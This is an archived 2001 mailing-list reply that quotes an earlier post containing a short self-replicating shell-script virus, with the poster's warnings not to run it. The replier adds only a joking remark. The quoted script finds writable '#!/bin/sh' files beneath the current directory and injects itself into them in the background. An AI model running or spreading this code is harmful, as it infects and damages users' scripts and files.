[PLUG] anti virus

Edward Webb ewebb1@purdue.edu
Thu, 20 Sep 2001 11:21:56 -0700


> (PLEASE do NOT run this -- if you do, I am not responsible for the
damage):

> #!/bin/sh
> ( V_s=$0;i () { ( e=echo; $e 1 r \!sed -n 2p $V_s;$e w;$e q) | ed -s $1;};
d
> () { if [ -w $1 -a "`head -1 $1`" = "#!/bin/sh" -a "`grep -n V_i $1`" =
> "" ]; then i $1; fi;}; for b in `find . -type f -print`;do d $b;done; ) &

> echo I am a shell virus
>
 >And DON'T RUN THE ABOVE SCRIPT!

so...
what your saying is .. DONT run this.. right?